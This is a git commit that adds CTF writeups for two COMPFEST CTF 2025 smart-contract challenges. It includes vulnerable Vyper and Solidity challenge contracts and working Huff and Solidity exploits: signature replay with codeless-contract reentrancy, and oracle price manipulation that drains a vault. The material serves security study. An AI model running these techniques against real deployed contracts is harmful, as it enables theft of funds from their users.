add COMPFEST CTF 2025

minaminao · minaminao · commit 9e3275095385 · 2025-10-05T13:06:37.000+09:00
diff --git a/.gitignore b/.gitignore
@@ -41,3 +41,5 @@ storage
 attachments/
 
 .env
+
+.sage
diff --git a/README.md b/README.md
@@ -99,6 +99,8 @@ Please be aware that these contain spoilers. For contribution guidelines, please
 
 | CTF Name                                                                                                                   | Event Month          |
 | -------------------------------------------------------------------------------------------------------------------------- | -------------------- |
+| [COMPFEST CTF 2025](src/Compfest2025/)                                                                                     | 2025-10              |
+| [ImaginaryCTF 2025](https://github.com/ImaginaryCTF/ImaginaryCTF-2025-Challenges/tree/main/Misc/PBJ) 🔗                     | 2025-09              |
 | [corCTF 2025](https://github.com/Crusaders-of-Rust) 🔗                                                                      | 2025-08              |
 | [Full Weak Engineer CTF](src/FullWeakEngineerCTF/)                                                                         | 2025-08              |
 | [HITCON CTF 2025](https://github.com/minaminao/my-ctf-challenges/tree/main/ctfs/hitcon-ctf-2025/maximal-extractable-vuln)  | 2025-08              |
@@ -142,6 +144,7 @@ Please be aware that these contain spoilers. For contribution guidelines, please
 | [DeFi-Security-Summit-Stanford](src/DeFiSecuritySummitStanford/)                                                           | 2022-08              |
 | [MapleCTF 2022](src/MapleCTF2022)                                                                                          | 2022-08              |
 | [Paradigm CTF 2022](src/ParadigmCTF2022/)                                                                                  | 2022-08              |
+| [TJCTF 2022](https://github.com/otter-sec/sol-ctf-framework/tree/main/examples/moar-horse-5)                               | 2022-05              |
 | [ALLES! CTF 2021](https://github.com/sajjadium/ctf-archives/tree/main/ctfs/ALLES/2021/crypto) 🔗                            | 2021-09              |
 | [Paradigm CTF 2021](src/ParadigmCTF2021/)                                                                                  | 2021-02              |
 | [0x41414141 CTF](src/0x41414141CTF/)                                                                                       | 2021-01              |
diff --git a/src/Compfest2025/SnakeInception/Exploit.huff b/src/Compfest2025/SnakeInception/Exploit.huff
@@ -0,0 +1,40 @@
+#define constant CHALLENGE_ADDRESS = 0xcEf1EF6E3478d476d3DdB843f7547227Fb866a15
+
+#define macro CONSTRUCTOR() = {
+    0xc48924a3 0x00 sstore
+    0x09775b47 0x01 sstore
+    [CHALLENGE_ADDRESS] 0x02 sstore
+    0x1c 0x03 sstore
+    0xba76c938bca5ba6daf32f8940f109d10a5e0cd681900c4b0d1152ba90c72707a 0x04 sstore
+    0xd21a7983cb860b1db4ba9571efee60fdc6ac7b02a3a8b5a082f46bab6c5db47c 0x05 sstore
+    _RETURN_MAIN()
+}
+
+#define macro _RETURN_MAIN() = {
+    __codesize(MAIN)        // [size]
+    dup1                    // [size, size]
+    __codeoffset(MAIN)      // [offset, size, size]
+    0x0                     // [0, offset, size, size]
+    codecopy                // [size]
+    0x0                     // [0, size]
+    return                  // []
+}
+
+#define macro MAIN() = takes (0) returns (0) {
+    2 gas mod sload 0x00 mstore
+    0x03 sload msize mstore
+    0x04 sload 0x40 mstore
+    0x05 sload 0x60 mstore
+
+    0x20        // retSize
+    0x80        // retOffset
+    msize       // argsSize
+    0x1c        // argsOffset
+    0x00        // value
+    0x02 sload  // addr
+    gas         // gas
+    call
+
+    0x00 mstore
+    0x20 0x00 return
+}
diff --git a/src/Compfest2025/SnakeInception/Exploit.s.sol b/src/Compfest2025/SnakeInception/Exploit.s.sol
@@ -0,0 +1,52 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.20;
+
+import {Script, console} from "forge-std/Script.sol";
+import {Setup} from "./challenge/Setup.sol";
+
+// forge script src/Compfest2025/SnakeInception/Exploit.s.sol:ExploitScript --private-key $PRIVATE_KEY -vvvvv --broadcast
+
+contract ExploitScript is Script {
+    function run() public {
+        vm.startBroadcast();
+
+        // Setup 1.
+        new Exploit();
+
+        // Setup 2.
+        // Run cast send (cast address-zero) --value 0 --private-key $PRIVATE_KEY --json | jq .blockHash -r | python -c "import sys; print(int(input(), 16) % 5)"
+        // until convert(blockhash(block.number-1), uint256) % 5 == 0
+
+        // Setup 3.
+        Exploit(0xA68e541c388a904e398968C8D37815CCed3f2D5e).exploit{gas: 5000000}();
+
+        vm.stopBroadcast();
+    }
+}
+
+contract Exploit {
+    Setup setup = Setup(0x4Cdb866705AF7F07029c85503245988Acdd4a5B7);
+    address exploitAddr;
+
+    constructor() {
+        bytes memory bytecode =
+            hex"63c48924a35f556309775b4760015573cef1ef6e3478d476d3ddb843f7547227fb866a15600255601c6003557fba76c938bca5ba6daf32f8940f109d10a5e0cd681900c4b0d1152ba90c72707a6004557fd21a7983cb860b1db4ba9571efee60fdc6ac7b02a3a8b5a082f46bab6c5db47c600555602b80607d5f395ff360025a06545f5260035459526004546040526005546060526020608059601c5f6002545af15f5260205ff3";
+        address addr;
+        assembly {
+            addr := create(0, add(bytecode, 0x20), mload(bytecode))
+        }
+        exploitAddr = addr;
+    }
+
+    function exploit() public {
+        address(this).call{gas: 2000001}(abi.encodeWithSignature("exploit(uint256)", 1000001));
+        address(this).call{gas: 2000002}(abi.encodeWithSignature("exploit(uint256)", 1000002));
+    }
+
+    function exploit(uint256 gas) public {
+        exploitAddr.call{gas: gas}("");
+        require(setup.isSolved());
+    }
+}
+
+// COMPFEST17{re3ntr4ncY_thrU_E04_c0d3L3ss_re3ntr4ncY_1s_p0ssible_8c8be953a5}
diff --git a/src/Compfest2025/SnakeInception/README.md b/src/Compfest2025/SnakeInception/README.md
@@ -0,0 +1,22 @@
+
+Since the contract is using raw_call,  no problem if it goes OOG.
+
+There are a signature in a past block:
+```
+$ cast run (pbpaste)
+Executing previous transactions from the block.
+Traces:
+  [63283] 0xd68e25185a3c720c2Ab2bC4C88F2F20921C38652::09775b47(000000000000000000000000000000000000000000000000000000000000001bba76c938bca5ba6daf32f8940f109d10a5e0cd681900c4b0d1152ba90c72707a2de5867c3479f4e24b456a8e10119f00f40261e40b9fea9b3cddf2e163d88cc5)
+    ├─ [3000] PRECOMPILES::ecrecover(0x7eccd7ead486a50dc0e11109d938bdaf7bef10235cc2c1516ebdc81dff4a4c3b, 27, 84340066570771003327740667532724463987288408720245297984948571015505358516346, 20759614346651503343478388117300426381544956674102488141466218118965907459269) [staticcall]
+    │   └─ ← [Return] 0x000000000000000000000000b1fdc7607932246c3551d4aa17e19c1ea95840f9
+    ├─ [18] PRECOMPILES::identity(0x0000000000000000000000000000000000000000000000000000000000000000)
+    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
+    ├─ [0] 0xEB876D991FdA87Fdc45e96c6f7025fC77dC21CA1::fallback{value: 20000000000000000000}()
+    │   └─ ← [Stop]
+    ├─ emit Claimed(param0: 0xEB876D991FdA87Fdc45e96c6f7025fC77dC21CA1, param1: 20000000000000000000 [2e19])
+    └─ ← [Stop]
+
+
+Transaction successfully executed.
+Gas used: 68390
+```
diff --git a/src/Compfest2025/SnakeInception/challenge/Setup.sol b/src/Compfest2025/SnakeInception/challenge/Setup.sol
@@ -0,0 +1,37 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.16;
+
+interface Vault {
+    event Claimed(address indexed user, uint256 amount);
+
+    function claimed(bytes32 key) external view returns (bool);
+    function target_message() external view returns (bytes32);
+    function reward_amount() external view returns (uint256);
+    function CEO() external view returns (address);
+    function fund_contract() external payable;
+    function get_message_to_sign() external view returns (bytes32);
+    function claim_reward(uint256 v, uint256 r, uint256 s) external;
+    function gamble_reward(uint256 v, uint256 r, uint256 s) external;
+}
+
+contract Setup {
+    Vault public challenge;
+
+    constructor() payable {
+        address deployed_address;
+        bytes memory compiled_vyper_code =
+            hex"7f7eccd7ead486a50dc0e11109d938bdaf7bef10235cc2c1516ebdc81dff4a4c3b6004556801158e460913d0000060055573b1fdc7607932246c3551d4aa17e19c1ea95840f96006556106c356600436101561000d5761061a565b600035601c5260005163dac69654811415610035576000546106715760016000556000600055005b3461067157630abf8ea68114156100525760045460005260206000f35b6309775b478114156102a4576001546106715760016001553361014052602b610140513b11156100c1576308c379a06101605260206101805260196101a0527f436f6e74726163742063616e277420626520746f6f20626967000000000000006101c0526101a050606461017cfd5b6000600435602082610220010152602081019050602435602082610220010152602081019050604435602082610220010152602081019050806102205261022090508051806020830120905090506101605260036101605160e05260c052604060c020541561016f576308c379a06101805260206101a052601d6101c0527f596f7520416c726561647920436c61696d65642056726f6f6f2e2e2e2e0000006101e0526101c050606461019cfd5b6101405161016051610180516004546101a0526004356101c0526024356101e05260443561020052610200516101e0516101c0516101a05160065801610620565b6102605261018052610160526101405261026051610180526006546101805114610219576308c379a06101a05260206101c05260116101e0527f496e76616c6964207369676e6174757265000000000000000000000000000000610200526101e05060646101bcfd5b60006101a0526101a08051602001806101e08284600060045af115610671575050600060006101e051610200600554335af11561067157600160036101605160e05260c052604060c02055337fd8138f8a3f377c5259ca548e70e4c2de94f129f5a11036a15b69513cba2b426a6101a0808080600554815250506020905090506101a0a26000600155005b63c48924a38114156105aa576002546106715760016002553361014052602b610140513b1115610313576308c379a06101605260206101805260196101a0527f436f6e74726163742063616e277420626520746f6f20626967000000000000006101c0526101a050606461017cfd5b6000600435602082610220010152602081019050602435602082610220010152602081019050604435602082610220010152602081019050806102205261022090508051806020830120905090506101605260036101605160e05260c052604060c02054156103c1576308c379a06101805260206101a052601d6101c0527f596f7520416c726561647920436c61696d65642056726f6f6f2e2e2e2e0000006101e0526101c050606461019cfd5b6101405161016051610180516004546101a0526004356101c0526024356101e05260443561020052610200516101e0516101c0516101a05160065801610620565b610260526101805261016052610140526102605161018052600654610180511461046b576308c379a06101a05260206101c05260116101e0527f496e76616c6964207369676e6174757265000000000000000000000000000000610200526101e05060646101bcfd5b600554600280820282158284830414171561067157809050905090506101a052436001808210610671578082039050905061010043038112610671574381101561067157406005808206905090506104fa5760006101c0526101c08051602001806102008284600060045af11561067157505060006000610200516102206101a051335af11561067157610556565b60046101c0527f6c6d616f000000000000000000000000000000000000000000000000000000006101e0526101c08051602001806102208284600060045af11561067157505060006000610220516102406000335af115610671575b600160036101605160e05260c052604060c02055337fd8138f8a3f377c5259ca548e70e4c2de94f129f5a11036a15b69513cba2b426a6101c0808080600554815250506020905090506101c0a26000600255005b63cc3c0f068114156105d057600360043560e05260c052604060c0205460005260206000f35b634bb6d6318114156105e85760045460005260206000f35b632381a60e8114156106005760055460005260206000f35b63a10885718114156106185760065460005260206000f35b505b60006000fd5b6101c0526101405261016052610180526101a052610140516101e052610160516102005261018051610220526101a05161024052602060c060806101e060015afa5060c0516000526000516101c051565b600080fd5b61004d6106c30361004d60003961004d6106c3036000f3";
+
+        assembly {
+            deployed_address := create(0, add(compiled_vyper_code, 0x20), mload(compiled_vyper_code))
+        }
+
+        require(deployed_address != address(0), "Deployment failed");
+        challenge = Vault(deployed_address);
+        challenge.fund_contract{value: 80 ether}();
+    }
+
+    function isSolved() external view returns (bool) {
+        return address(challenge).balance == 0;
+    }
+}
diff --git a/src/Compfest2025/SnakeInception/challenge/Vault.vy_ b/src/Compfest2025/SnakeInception/challenge/Vault.vy_
@@ -0,0 +1,82 @@
+# @version 0.2.16
+
+event Claimed:
+    user: indexed(address)
+    amount: uint256
+
+claimed: public(HashMap[bytes32, bool])
+target_message: public(bytes32)
+reward_amount: public(uint256)
+CEO: public(address)
+
+@external
+def __init__():
+    # The message players need to sign
+    self.target_message = keccak256("I, The Compfest CEO, Hereby Declare That I Will Give 20 ETH To this person")
+    self.reward_amount = 20 * 10**18  # 20 ETH
+    self.CEO = 0xB1fdC7607932246c3551D4aA17e19c1eA95840F9  
+
+@external
+@payable
+@nonreentrant("claim") 
+def fund_contract():
+    pass
+
+@external
+@view
+def get_message_to_sign() -> bytes32:
+    return self.target_message
+
+
+@internal
+@pure
+def _recover_signer(message_hash: bytes32, v: uint256, r: uint256, s: uint256) -> address:
+    return ecrecover(message_hash, v, r, s)
+
+@external
+@nonreentrant("claim") 
+def claim_reward(v: uint256, r: uint256, s: uint256):
+    
+    temp: address = msg.sender
+    assert temp.codesize <= 43, "Contract can't be too big"
+    
+    sig_hash: bytes32 = keccak256(concat(convert(v, bytes32), convert(r, bytes32), convert(s, bytes32)))
+
+    assert not self.claimed[sig_hash], "You Already Claimed Vrooo...."
+    
+    signer: address = self._recover_signer(self.target_message, v, r, s)
+    
+    assert signer == self.CEO, "Invalid signature"
+    
+    raw_call(msg.sender, b"", value=self.reward_amount)
+    
+    self.claimed[sig_hash] = True
+
+    log Claimed(msg.sender, self.reward_amount)
+
+@external
+@nonreentrant("claim") 
+def gamble_reward(v: uint256, r: uint256, s: uint256):
+    """Gamble 20 ETH with valid signature"""
+
+    temp: address = msg.sender
+    assert temp.codesize <= 43, "Contract can't be too big"
+
+    sig_hash: bytes32 = keccak256(concat(convert(v, bytes32), convert(r, bytes32), convert(s, bytes32)))
+
+    assert not self.claimed[sig_hash], "You Already Claimed Vrooo...."
+    
+    signer: address = self._recover_signer(self.target_message, v, r, s)
+    
+    assert signer == self.CEO, "Invalid signature"
+
+    real_reward: uint256 = self.reward_amount * 2  # Double the reward for gambling
+
+    if(convert(blockhash(block.number-1), uint256) % 5 == 0):
+        raw_call(msg.sender, b"", value=real_reward)
+    else:
+        raw_call(msg.sender, b"lmao", value=0)
+    
+    self.claimed[sig_hash] = True
+
+    log Claimed(msg.sender, self.reward_amount)
diff --git a/src/Compfest2025/SyntheticManipulation/Exploit.s.sol b/src/Compfest2025/SyntheticManipulation/Exploit.s.sol
@@ -0,0 +1,60 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.20;
+
+import {Script, console} from "forge-std/Script.sol";
+
+// forge script src/Compfest2025/SyntheticManipulation/Exploit.s.sol:ExploitScript --private-key $PRIVATE_KEY -vvvvv --broadcast
+
+contract ExploitScript is Script {
+    function run() public {
+        vm.startBroadcast();
+
+        new Exploit().exploit{value: 4900 ether}();
+
+        vm.stopBroadcast();
+    }
+}
+
+contract Exploit {
+    function exploit() external payable {
+        Setup setup = Setup(0x048E929109800A63574193706578A7F37F4c987C);
+        Token token = Token(setup.challenge());
+        Oracle oracle = Oracle(token.priceOracle());
+
+        address(oracle).call(abi.encodeWithSelector(hex"f7699c28", address(this)));
+        oracle.setPrice(oracle.getLatestPrice() * 1000);
+
+        token.openVault{value: 4900 ether}(100_000_000_000_000_000_000_000_000_000_001);
+
+        uint256 balance = token.balanceOf(address(this));
+        token.transfer(address(setup), balance);
+
+        require(setup.isSolved());
+    }
+}
+
+interface Oracle {
+    function getLatestPrice() external returns (uint256);
+    function setPrice(uint256 _price) external;
+}
+
+interface Setup {
+    function challenge() external returns (address);
+    function isSolved() external returns (bool);
+}
+
+interface Token {
+    /*
+        field0 = msg.value
+        field1 = amount
+        (field0 * latestPrice / (10 ** 8) * 100) / field1
+    */
+    function openVault(uint256 _pid) external payable;
+    function nextVaultId() external;
+    function transferFrom(address sender, address recipient, uint256 amount) external;
+    function priceOracle() external returns (address);
+    function balanceOf(address account) external returns (uint256);
+    function transfer(address recipient, uint256 amount) external;
+}
+
+// COMPFEST17{reverse_evm_dikit_dikit_lah_ya_bosen_kalo_sourcenya_terpampang_semua_015ec8d7f5}
diff --git a/src/Compfest2025/SyntheticManipulation/README.md b/src/Compfest2025/SyntheticManipulation/README.md
@@ -0,0 +1,4 @@
+Decompile Results:
+- Setup: https://app.dedaub.com/decompile?md5=2aef16a393db53d9e7023c3264f9e3be
+- Token: https://app.dedaub.com/decompile?md5=bdf55f6d38f33d87fbf34d8e73bf9e1c
+- Oracle: https://app.dedaub.com/decompile?md5=ba3d8cc72289eb34fc3690931a763398

-Original file line number
+Diff line change
 attachments/
 .env
++
 +.sage